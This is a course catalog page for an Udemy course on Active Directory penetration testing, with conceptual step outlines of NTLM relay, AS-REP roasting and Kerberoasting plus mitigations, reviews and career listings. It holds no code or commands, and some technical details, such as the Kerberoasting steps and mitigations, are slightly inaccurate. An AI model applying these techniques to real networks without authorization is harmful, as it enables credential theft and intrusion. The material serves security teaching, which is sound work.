OpenCourser brand icon
Sign in
We may earn an affiliate commission when you visit our partners.
Course image
Udemy logo

Advanced Windows Active Directory Penetration Testing

4.6 Filled star Filled star Filled star Filled star Half star
Based on 44 ratings
see reviews
CyberGen LLC

Windows Active Directory (AD) has been the center stage for most corporate infrastructure for decades. Hence, it is crucial for security professionals to grasp the intricacies and threats associated with Windows infrastructures.

Read more

Windows Active Directory (AD) has been the center stage for most corporate infrastructure for decades. Hence, it is crucial for security professionals to grasp the intricacies and threats associated with Windows infrastructures.

Active Directory Penetration Tests offer a better way for security experts to analyze and engage with the threats present in modern AD environments. This course, suitable for experienced pentesters and anyone interested in taking their pentesting to the next level, includes loads of detailed videos and thorough walkthroughs of attack scenarios and vectors, built upon extensive practical experience and dedicated research in compromising Windows AD ecosystems.

This course emulates real-world attack scenarios, beginning with an adversary with nothing but just a network-level access and no Active Directory-level access to obtaining an initial foothold, laterally moving withing the network and escalating privileges to that of Enterprise Administrator level. The emphasis lies on abusing often-overlooked domain features rather than merely software vulnerabilities.

Key areas of focus include:

  • External OSINT

  • Initial Access via Kerberos-based Password Spray, Network Protocol Abuses, etc.

  • Active Directory Situational Awareness

  • Privilege Escalation via Kerberoasting, Kerberos Delegations, Access Control Lists, etc.

  • Persistence via Golden Ticket, Silver Ticket, Diamond Ticket, Sapphire Ticket, etc.

  • Abusing Active Directory Certificate Services (AD CS)

  • Domain and Forest Trust Abuses

  • Penetration Testing Report Writing

Enroll now

What's inside

Learning objectives

  • Overview of penetration testing, it's limitations and some logistics in delivering a pentest engagement.
  • Deploy an active directory lab to execute attacks in a safe environment.
  • Master the fundamentals of active directory (ad).
  • Walkthrough the phases of ad kill chain when conducting a windows active directory penetration tests.
  • Learn to use an external osint as part of your internal ad penetration testing process.
  • Learn initial access techniques such as kerberos-based password spray, ntlm relay, nbns/llmnr protocol abuse, as-rep roasting, etc.
  • Learn network and domain enumeration techniques, both manually and semi-automatically using tools such as dig, nslookup, netexec, bloodhound, etc.
  • Learn domain privilege escalation and lateral movement techniques by abusing kerberos protocol for attacks such as kerberoasting, kerberos delegations, etc.
  • Learn domain privilege escalation and lateral movement techniques by abusing misconfigured active directory access control lists (acls).
  • Learn domain privilege escalation and lateral movement techniques by abusing general misconfigurations and poor ad user habits.
  • Abuse misconfigured active directory certificate services for privilege escalation and dominance.
  • Learn domain persistence techniques such as golden ticket, silver ticket, diamond ticket, sapphire ticket.
  • Explore different advanced techniques in cross domain and cross forest attacks such as sid filtering bypass, etc.
  • Writing a penetration testing report that will help your client in prioritizing and addressing discovered attack vectors and vulnerabilities.
  • Show more
  • Show less

Syllabus

Module 00 : Welcome
Welcome!
whoami
Why This Course?
Read more

Extra resource if inclined to build your own lab:

https://github.com/Orange-Cyberdefense/GOAD?tab=readme-ov-file

NTLM Authentication Process

  1. Client Request: The client (e.g., a user's computer) sends a request to the server to authenticate.

  2. Server Challenge: The server responds with a challenge, which is a random string of characters.

  3. Client Response: The client encrypts the challenge using the user's password hash and sends the encrypted response back to the server.

  4. Server Verification: The server decrypts the response using the stored password hash and verifies if it matches the challenge. If it does, the authentication is successful.

NTLM-Relay Attack Process

  1. Intercept Authentication: The attacker positions themselves in the middle of the communication between the client and the server (Man-in-the-Middle position).

  2. Initiate Connection: The attacker initiates a connection to the target server as the victim user.

  3. Relay Challenge: The attacker relays the server's challenge to the victim client.

  4. Client Response: The victim client sends the encrypted response back to the attacker.

  5. Relay Response: The attacker relays the client's response back to the server.

  6. Gain Access: The server verifies the response and grants access to the attacker, who can now perform actions as the victim user.

Mitigation Steps

  • Enable SMB Signing: This ensures that the data being transmitted is signed, preventing tampering.

  • Use Extended Protection for Authentication (EPA): This adds additional binding to the authentication process, making it harder for attackers to relay.

AS-REP Roasting is a technique used to extract password hashes from Kerberos tickets when Kerberos pre-authentication is disabled.

AS-REP Roasting Attack

  1. Reconnaissance: The attacker identifies accounts with Kerberos pre-authentication disabled.

  2. Send AS-REQ: The attacker sends an Authentication Server Request (AS-REQ) to the Domain Controller for the target account.

  3. Receive AS-REP: The Domain Controller responds with an Authentication Server Response (AS-REP) containing the Ticket Granting Ticket (TGT).

  4. Extract Hash: The attacker extracts the password hash from the AS-REP.

Mitigation Steps

  • Enable Kerberos Pre-Authentication: Ensure that Kerberos pre-authentication is enabled for all accounts.

Extra resource on relay attacks against IPv6:

https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/

Kerberoast is an attack that targets the Kerberos authentication protocol to extract password hashes from Kerberos tickets.

  1. Reconnaissance: The attacker identifies service accounts with Service Principal Names (SPNs) set in the Active Directory.

  2. Request Kerberos Ticket: The attacker, using an authenticated domain user, requests a Kerberos Ticket Granting Ticket (TGT) for the target SPN.

  3. Extract Ticket: The attacker extracts the encrypted Kerberos ticket from the response.

Mitigation Steps

  • Enable Kerberos Pre-Authentication: Ensure that Kerberos pre-authentication is enabled for all accounts.

  • Monitor for Suspicious Activity: Use monitoring tools to detect unusual authentication requests and ticket requests.

  • Use Strong Passwords: Enforce the use of strong, complex passwords for service accounts to make brute force attacks more difficult.

  • Limit SPN Assignment: Only assign SPNs to accounts that absolutely need them and regularly review and remove unnecessary SPNs.

  • Kerberos Delegation Purpose: Allows a service to request resources or perform actions on behalf of a user while maintaining security principles of authentication and authorization.

  • Types of Delegation:

    • Unconstrained Delegation: The service can impersonate the user for any service on any server.

    • Constrained Delegation: Limits the services that the delegated server can access.

    • Resource-Based Constrained Delegation: Further restricts delegation to specific resources.

  • Use Cases: Commonly used when an application, such as a web server, needs to access resources hosted on a different server, such as a SQL database.

  • Security: Helps facilitate secure, seamless interactions between services on behalf of users.

Traffic lights

Read about what's good
what should give you pause
and possible dealbreakers
Emulates real-world attack scenarios, starting with minimal access and escalating to Enterprise Administrator, reflecting practical pentesting engagements
Covers advanced techniques in cross-domain and cross-forest attacks, such as SID filtering bypass, which are crucial for comprehensive security assessments
Focuses on abusing often-overlooked domain features rather than software vulnerabilities, providing a unique and practical approach to AD penetration testing
Requires deploying an Active Directory lab, which may require additional hardware and software resources beyond a typical home or library setup
Includes penetration testing report writing, which is essential for communicating findings and recommendations to clients in a professional manner
Explores domain persistence techniques like Golden, Silver, Diamond, and Sapphire Tickets, which are critical for understanding advanced attack vectors

Save this course

Create your own learning path. Save this course to your list so you can find it easily later.
Save

Reviews summary

Advanced windows ad pentesting analysis

According to learners, this course on Advanced Windows Active Directory Penetration Testing offers a deep dive into practical AD attack techniques. Students frequently highlight the realistic labs and hands-on exercises as a major strength, praising the coverage of cutting-edge methods like Kerberoasting, ACL abuses, and various ticket attacks. While many find the instructor knowledgeable and the content comprehensive, some note that the course requires significant prerequisites and can be challenging without a solid foundation in networking and basic AD concepts. The detailed walkthroughs and tool demonstrations are often mentioned as particularly useful.
Techniques reflect current practices.
"The techniques and tools covered feel current and relevant to modern Active Directory environments."
"I appreciate that the course focuses on abusing features rather than just vulnerabilities, reflecting real-world attacks."
"The methods taught are highly applicable to contemporary penetration testing engagements."
Instructor demonstrates expertise.
"The instructor clearly knows their stuff and provides valuable insights throughout the modules."
"His explanations of complex topics were generally clear and easy to follow."
"I felt confident in the material being taught due to the instructor's evident expertise in the field."
Covers advanced attack vectors in depth.
"The technical depth of this course is impressive. It goes beyond the basics and dives into sophisticated AD attacks."
"I learned about many lesser-known AD attack techniques and how to practically execute them."
"The coverage of Kerberos attacks, ACLs, and ticket attacks was thorough and highly relevant."
"This course provided the advanced knowledge I was seeking to elevate my AD penetration testing skills."
Emphasis on realistic, hands-on practice.
"The hands-on labs were incredibly valuable, allowing me to practice real-world attack scenarios in a safe environment."
"Setting up the lab environment was challenging but essential. The exercises cover highly relevant techniques."
"I really appreciated the practical nature of the course. Doing the attacks myself helped solidify the concepts."
"Learning by doing is key in pentesting, and the course provides ample opportunity for that with its lab exercises."
Challenges in setting up the lab.
"Setting up the lab environment was the most frustrating part for me. It took significant time and troubleshooting."
"The lab setup instructions could be clearer, or perhaps provide pre-built VMs to reduce friction."
"Getting the lab environment to work correctly was a hurdle before I could even start the practical exercises."
Needs solid foundational knowledge.
"This course is definitely for experienced pentesters. Without a strong AD and networking background, you might struggle."
"While the course is excellent, I found myself needing to pause and research prerequisite topics frequently."
"As an intermediate learner, some parts moved quite quickly and assumed prior knowledge I didn't fully have."
"Ensure you have a solid grasp of Windows, AD fundamentals, and basic pentesting concepts before starting."

Activities

Be better prepared before your course. Deepen your understanding during and after it. Supplement your coursework and achieve mastery of the topics covered in Advanced Windows Active Directory Penetration Testing with these activities:
Review Kerberos Authentication
Solidify your understanding of Kerberos authentication to better grasp privilege escalation and lateral movement techniques.
Browse courses on Kerberos Authentication
Show steps
  • Read articles and documentation on Kerberos.
  • Watch videos explaining Kerberos concepts.
  • Complete a practice quiz on Kerberos.
Review Active Directory Fundamentals
Strengthen your understanding of Active Directory concepts to better understand attack vectors.
Browse courses on Active Directory
Show steps
  • Review the structure of Active Directory domains.
  • Study the roles of domain controllers.
  • Understand Group Policy Objects (GPOs).
Read 'Active Directory Pentesting'
Gain practical insights into real-world Active Directory penetration testing scenarios.
View Melania on Amazon
Show steps
  • Read the book cover to cover.
  • Take notes on key concepts and techniques.
  • Attempt to replicate some of the attacks in a lab environment.
Four other activities
Expand to see all activities and additional details
Show all seven activities
Practice Password Spraying
Reinforce your skills in password spraying techniques against a lab environment.
Show steps
  • Set up a lab environment with Active Directory.
  • Use tools like Kerbrute to perform password spraying.
  • Analyze the results and identify successful logins.
Build an AD Pentesting Lab
Create a fully functional Active Directory lab environment to practice penetration testing techniques.
Show steps
  • Choose a virtualization platform (e.g., VMware, VirtualBox).
  • Install Windows Server and configure Active Directory.
  • Populate the lab with users, groups, and resources.
  • Harden the lab environment and document the configurations.
Document Attack Paths
Create a detailed diagram and write-up of potential attack paths within a sample Active Directory environment.
Show steps
  • Design a sample Active Directory environment.
  • Identify potential vulnerabilities and misconfigurations.
  • Map out possible attack paths using tools like BloodHound.
  • Write a report detailing the attack paths and potential impact.
Read 'Active Directory Security'
Deepen your understanding of Active Directory security best practices and vulnerabilities.
View Active Directory: Designing, Deploying, and... on Amazon
Show steps
  • Read the book cover to cover.
  • Take notes on key security concepts and configurations.
  • Implement some of the security measures in your lab environment.

Career center

Learners who complete Advanced Windows Active Directory Penetration Testing will develop knowledge and skills that may be useful to these careers:
Penetration Tester
A Penetration Tester identifies and exploits vulnerabilities in systems and networks. This course on Windows Active Directory Penetration Testing directly aligns with the responsibilities of a penetration tester. The course provides understanding of Active Directory, deployment of a lab, and how to execute attacks in a safe environment. With lessons in external open source intelligence, initial access strategies such as Kerberos-based password spray, network protocol abuses, and privilege escalation techniques, this course helps those who want to find creative vectors of attack. A penetration tester will find immense value in learning how to write reports that help clients prioritize and address discovered attack vectors and vulnerabilities.
See salaries and explore the career path for Penetration Tester
Red Team Operator
A Red Team Operator simulates real-world attacks to test an organization's security defenses. This "Advanced Windows Active Directory Penetration Testing" course is highly relevant for red team members. The course focuses on emulating real-world attack scenarios, starting with minimal network access and escalating privileges to the Enterprise Administrator level. The course emphasizes abusing often-overlooked domain features. A red team operator would benefit from the practical, hands-on approach to compromising Windows Active Directory ecosystems that this course provides.
See salaries and explore the career path for Red Team Operator
Vulnerability Analyst
Vulnerability Analysts identify weaknesses in systems and applications. This course on Windows Active Directory Penetration Testing provides a thorough understanding of Active Directory vulnerabilities and how to exploit them. The course offers detailed videos and walkthroughs of attack scenarios and vectors. By learning initial access techniques, privilege escalation methods, and domain persistence strategies, a vulnerability analyst can enhance their ability to identify and assess risks. Modules on abusing Active Directory Certificate Services and domain trust abuses are directly applicable to vulnerability assessment tasks.
See salaries and explore the career path for Vulnerability Analyst
Security Consultant
Security Consultants advise organizations on how to improve their security posture. This course on Windows Active Directory Penetration Testing helps a security consultant understand the intricacies and threats associated with Windows infrastructures. The course emphasizes emulating real-world attack scenarios, starting with minimal access and escalating privileges to the Enterprise Administrator level. Given lessons in abusing often-overlooked domain features and penetration testing report writing, this course prepares a security consultant to identify vulnerabilities, propose solutions, and communicate security risks effectively to clients.
See salaries and explore the career path for Security Consultant
Information Security Analyst
Information Security Analysts protect an organization's computer systems and networks from cyber threats. This course on Windows Active Directory Penetration Testing offers a deep dive into the techniques used to compromise Active Directory environments. The course provides a comprehensive understanding of Active Directory kill chain phases. By learning topics ranging from initial access techniques to domain persistence, the information security analyst can gain practical skills in identifying, preventing, and responding to attacks. Course modules on privilege escalation via Kerberoasting, Kerberos delegations, and access control lists will be particularly useful to the analyst.
See salaries and explore the career path for Information Security Analyst
Security Engineer
Security Engineers design, implement, and manage security systems. This course on Windows Active Directory Penetration Testing offers valuable insight into how Active Directory environments are compromised. The course covers key areas such as external OSINT, privilege escalation, and persistence techniques. By understanding these attack vectors, a security engineer can design more robust and effective security measures. Modules on abusing Active Directory Certificate Services and implementing domain trust mitigations are particularly relevant for engineers focused on hardening Active Directory environments.
See salaries and explore the career path for Security Engineer
Cybersecurity Specialist
Cybersecurity Specialists focus on protecting computer systems and data from cyber threats. This course on Windows Active Directory Penetration Testing is highly relevant. The course provides comprehensive knowledge of Active Directory attack scenarios. The course emphasizes often-overlooked domain features. By taking this course, a cybersecurity specialist will be better equipped to identify, prevent, and respond to attacks on Active Directory environments. The modules on persistence techniques are especially useful for understanding how attackers maintain access.
See salaries and explore the career path for Cybersecurity Specialist
IT Auditor
An IT Auditor evaluates an organization's IT infrastructure and controls to ensure compliance and security. This course on Windows Active Directory Penetration Testing provides an understanding of common attack vectors and vulnerabilities within Active Directory. The course teaches to emulate real-world attack scenarios. By learning about initial access techniques, privilege escalation methods, and domain persistence strategies, an IT auditor becomes better equipped to assess an organization's security posture. Modules on domain trust abuses help the auditor evaluate the effectiveness of existing security controls.
See salaries and explore the career path for IT Auditor
Network Security Engineer
Network Security Engineers protect an organization's network infrastructure from unauthorized access and cyber threats. This course on Windows Active Directory Penetration Testing is useful because it covers network-level access exploitation and lateral movement within a network. The course also highlights using Network and Domain Enumeration techniques, both manually and semi-automatically using tools such as Dig, Nslookup, NetExec, BloodHound, etc. A network security engineer can apply this training to enhance their understanding of network vulnerabilities and how to defend against them.
See salaries and explore the career path for Network Security Engineer
System Administrator
System Administrators manage and maintain computer systems, including Active Directory environments. This course on Windows Active Directory Penetration Testing is useful by providing a defensive perspective. The course outlines how attackers exploit Active Directory vulnerabilities, emphasizing often-overlooked domain features. System administrators can use this knowledge to proactively identify and remediate potential security weaknesses within their Active Directory infrastructure. Modules on Active Directory Certificate Services will improve security configuration.
See salaries and explore the career path for System Administrator
Incident Responder
Incident Responders manage and contain security breaches. This course on Windows Active Directory Penetration Testing may be relevant by providing insights into the attack techniques used to compromise Active Directory environments. The course covers a range of attack scenarios. By learning about initial access, privilege escalation, and persistence, an incident responder can better understand how attackers operate, contain breaches, and prevent future incidents. The modules detailing persistence techniques can be particularly valuable.
See salaries and explore the career path for Incident Responder
Digital Forensics Analyst
Digital Forensics Analysts investigate cyber incidents to determine the cause and scope of the breach. This course on Windows Active Directory Penetration Testing may be useful by providing insights into attacker techniques and methodologies used in Active Directory environments. The course covers a wide range of attack scenarios, including initial access, privilege escalation, and persistence. A forensics analyst will find the course relevant when analyzing compromised systems. This course is useful in understanding how attackers operate within a network.
See salaries and explore the career path for Digital Forensics Analyst
Cloud Security Engineer
Cloud Security Engineers secure cloud-based systems and data. This course on Windows Active Directory Penetration Testing helps understand the security implications of integrating Active Directory with cloud environments. The course explores various attack vectors. Cloud Security Engineers can use this knowledge to design and implement security controls that protect Active Directory in the cloud. Modules on domain and forest trust abuses can be invaluable when managing hybrid environments that span on-premises and cloud infrastructures.
See salaries and explore the career path for Cloud Security Engineer
Compliance Officer
Compliance Officers ensure that an organization follows regulatory requirements and internal policies related to data security. This course on Windows Active Directory Penetration Testing may be useful to the compliance officer. This course covers a wide array of initial access and persistence techniques. The course helps a compliance officer understand security risks and ensuring that appropriate security controls are in place to protect sensitive data. The course can help inform the creation of policies.
See salaries and explore the career path for Compliance Officer
Application Security Engineer
Application Security Engineers focus on securing software applications. This course on Windows Active Directory Penetration Testing may be relevant by providing insights into how attackers can exploit vulnerabilities in applications that interact with Active Directory. The course highlights Kerberos abuses. Application Security Engineers can use this knowledge to implement secure coding practices and design applications to be resistant to Active Directory-related attacks. Modules on abusing Active Directory Certificate Services may be particularly useful.
See salaries and explore the career path for Application Security Engineer

Reading list

We've selected two books that we think will supplement your learning. Use these to develop background knowledge, enrich your coursework, and gain a deeper understanding of the topics covered in Advanced Windows Active Directory Penetration Testing.
Cover image
Active Directory
Save
Provides an in-depth look at Active Directory security best practices and common vulnerabilities. It valuable resource for understanding how to secure Active Directory environments against attacks. It is more valuable as additional reading to provide a deeper understanding of security principles. This book is commonly used by system administrators and security professionals.
Active Directory: Designing, Deploying, and Running...
Paperback
$$
Active Directory: Designing, Deploying, and Running...
Kindle Edition
$$

Share

Help others find this course page by sharing it with your friends and followers:
Facebook
LinkedIn
Reddit
X
Link
Email

Similar courses

Similar courses are unavailable at this time. Please try again later.
Course image
Rating
4.6 Filled star Filled star Filled star Filled star Half star
Effort
7.5 total hours
Via
Udemy
Instructor
CyberGen LLC
Language
English
Traffic lights
Read about what's good
what should give you pause
and possible dealbreakers
Emulates real-world attack scenarios, starting with minimal access and escalating to Enterprise Administrator, reflecting practical pentesting engagements
Covers advanced techniques in cross-domain and cross-forest attacks, such as SID filtering bypass, which are crucial for comprehensive security assessments
Focuses on abusing often-overlooked domain features rather than software vulnerabilities, providing a unique and practical approach to AD penetration testing
Requires deploying an Active Directory lab, which may require additional hardware and software resources beyond a typical home or library setup
Includes penetration testing report writing, which is essential for communicating findings and recommendations to clients in a professional manner
Explores domain persistence techniques like Golden, Silver, Diamond, and Sapphire Tickets, which are critical for understanding advanced attack vectors
Share this
Share to help others discover this course.
Facebook LinkedIn X Reddit Link Email
Begin learning today
Enroll now to gain full access to Advanced Windows Active Directory Penetration Testing.
Enroll now
Save for later
Add this course to your list. Find it anytime.
Save
Our mission

OpenCourser helps millions of learners each year. People visit us to learn workspace skills, ace their exams, and nurture their curiosity.

Our extensive catalog contains over 50,000 courses and twice as many books. Browse by search, by topic, or even by career interests. We'll match you to the right resources quickly.

Find this site helpful? Tell a friend about us.

Affiliate disclosure

We're supported by our community of learners. When you purchase or subscribe to courses and programs or purchase books, we may earn a commission from our partners.

Your purchases help us maintain our catalog and keep our servers humming without ads.

Thank you for supporting OpenCourser.

© 2016 - 2025 OpenCourser